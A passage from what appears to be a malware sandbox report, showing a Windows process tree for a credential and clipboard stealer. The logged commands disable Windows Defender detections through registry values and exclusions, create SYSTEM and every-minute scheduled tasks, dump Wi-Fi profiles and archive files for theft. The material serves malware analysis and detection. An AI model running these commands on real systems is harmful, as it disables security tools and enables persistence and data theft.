                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                            6⤵
                                              PID:5060
                                              • C:\Windows\SysWOW64\forfiles.exe
                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                7⤵
                                                  PID:1972
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                    8⤵
                                                      PID:3104
                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                        9⤵
                                                          PID:2156
                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                      7⤵
                                                        PID:2552
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                          8⤵
                                                            PID:4732
                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                              9⤵
                                                                PID:2928
                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                            7⤵
                                                              PID:5296
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                8⤵
                                                                  PID:5312
                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                    9⤵
                                                                      PID:5376
                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                  7⤵
                                                                    PID:5408
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                      8⤵
                                                                        PID:5448
                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                          9⤵
                                                                            PID:5472
                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                        7⤵
                                                                          PID:5484
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                            8⤵
                                                                              PID:5496
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                9⤵
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:5536
                                                                                • C:\Windows\SysWOW64\gpupdate.exe
                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                  10⤵
                                                                                    PID:5944
                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                            6⤵
                                                                              PID:5780
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                7⤵
                                                                                  PID:5840
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                    8⤵
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:5900
                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                      9⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:5272
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 17:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSD1B7.tmp\Install.exe\" Wt /YVydidAJWo 385118 /S" /V1 /F
                                                                                6⤵
                                                                                • Drops file in Windows directory
                                                                                • Creates scheduled task(s)
                                                                                PID:5752
                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"
                                                                                6⤵
                                                                                  PID:708
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    /C schtasks /run /I /tn biPxHmULFllsbMgnpt
                                                                                    7⤵
                                                                                      PID:5208
                                                                                      • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                        schtasks /run /I /tn biPxHmULFllsbMgnpt
                                                                                        8⤵
                                                                                          PID:3776
                                                                                • C:\Users\Admin\Pictures\olLriDTodnhlhNqsfTzJYRiU.exe
                                                                                  "C:\Users\Admin\Pictures\olLriDTodnhlhNqsfTzJYRiU.exe"
                                                                                  4⤵
                                                                                  • Modifies firewall policy service
                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                  • Checks BIOS information in registry
                                                                                  • Executes dropped EXE
                                                                                  • Checks whether UAC is enabled
                                                                                  • Drops file in System32 directory
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  PID:5576
                                                                                • C:\Users\Admin\Pictures\269xoqmLlAArxxjNLYSvtI2S.exe
                                                                                  "C:\Users\Admin\Pictures\269xoqmLlAArxxjNLYSvtI2S.exe"
                                                                                  4⤵
                                                                                  • Executes dropped EXE
                                                                                  • Adds Run key to start application
                                                                                  PID:5384
                                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5488
                                                                                    • C:\Windows\SYSTEM32\msiexec.exe
                                                                                      "msiexec.exe" /qn /i VirtualBox-6.1.20-r143896.msi ADDLOCAL=VBoxApplication,VBoxPython VBOX_INSTALLDESKTOPSHORTCUT=0 VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 /log "C:\Users\Admin\AppData\Local\Temp\charityengine-install-vbox-log.txt"
                                                                                      6⤵
                                                                                        PID:1692
                                                                                      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce_7.14.2_windows_x86_64.exe
                                                                                        "ce_7.14.2_windows_x86_64.exe" /S /v"/qn ACCTMGR_LOGIN=anonymous ACCTMGR_PASSWORDHASH=S16-01 /norestart /log C:\Users\Admin\AppData\Local\Temp\charityengine-install-ce-log.txt"
                                                                                        6⤵
                                                                                          PID:2948
                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                                                                                    3⤵
                                                                                      PID:3200
                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                                                                                    2⤵
                                                                                    • Loads dropped DLL
                                                                                    PID:3052
                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                                                                                      3⤵
                                                                                      • Blocklisted process makes network request
                                                                                      • Loads dropped DLL
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:1808
                                                                                      • C:\Windows\system32\netsh.exe
                                                                                        netsh wlan show profiles
                                                                                        4⤵
                                                                                          PID:4980
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\230210488309_Desktop.zip' -CompressionLevel Optimal
                                                                                          4⤵
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:1972
                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Adds Run key to start application
                                                                                      • Suspicious behavior: AddClipboardFormatListener
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:3560
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe'
                                                                                        3⤵
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:3708
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mstc.exe'
                                                                                        3⤵
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:952
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'
                                                                                        3⤵
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4908
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
                                                                                        3⤵
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:1628
                                                                                      • C:\Windows\System32\schtasks.exe
                                                                                        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Roaming\explorer.exe"
                                                                                        3⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:4760
                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                                                                                      2⤵
                                                                                      • Blocklisted process makes network request
                                                                                      • Loads dropped DLL
                                                                                      PID:3964
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2016 -ip 2016
                                                                                    1⤵
                                                                                      PID:2616
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2992 -ip 2992
                                                                                      1⤵
                                                                                        PID:2676
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2528 -ip 2528
                                                                                        1⤵
                                                                                          PID:1272
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3868 -ip 3868
                                                                                          1⤵
                                                                                            PID:3716
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSD1B7.tmp\Install.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\7zSD1B7.tmp\Install.exe Wt /YVydidAJWo 385118 /S
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            • Drops file in System32 directory
                                                                                            PID:5268
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                              2⤵
                                                                                                PID:5904
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                  3⤵
                                                                                                    PID:5852
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                      4⤵
                                                                                                        PID:4600
                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                          5⤵
                                                                                                            PID:5808
                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                        3⤵
                                                                                                          PID:5836
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                            4⤵
                                                                                                              PID:5828
                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                5⤵
                                                                                                                  PID:560
                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                              3⤵
                                                                                                                PID:1572
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                  4⤵
                                                                                                                    PID:5172
                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                      5⤵
                                                                                                                        PID:5352
                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                    3⤵
                                                                                                                      PID:4944
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                        4⤵
                                                                                                                          PID:5436
                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                            5⤵
                                                                                                                              PID:5476
                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                          3⤵
                                                                                                                            PID:4452
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                              4⤵
                                                                                                                                PID:1968
                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                  5⤵
                                                                                                                                  • Drops file in System32 directory
                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                  PID:5512
                                                                                                                                  • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                    6⤵
                                                                                                                                      PID:952
                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                              2⤵
                                                                                                                              • Drops file in System32 directory
                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                              PID:5232
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                3⤵
                                                                                                                                  PID:5376
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                  3⤵
                                                                                                                                    PID:5672
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                      4⤵
                                                                                                                                        PID:5724
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                      3⤵
                                                                                                                                        PID:2244
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                        3⤵
                                                                                                                                          PID:3236
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                          3⤵
                                                                                                                                            PID:4688
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:5396
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                              3⤵
                                                                                                                                                PID:3780
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                3⤵
                                                                                                                                                  PID:5560
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:5792
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                    3⤵
                                                                                                                                                      PID:5516
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4732
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                        3⤵
                                                                                                                                                          PID:1396
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                          3⤵
                                                                                                                                                            PID:6024
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
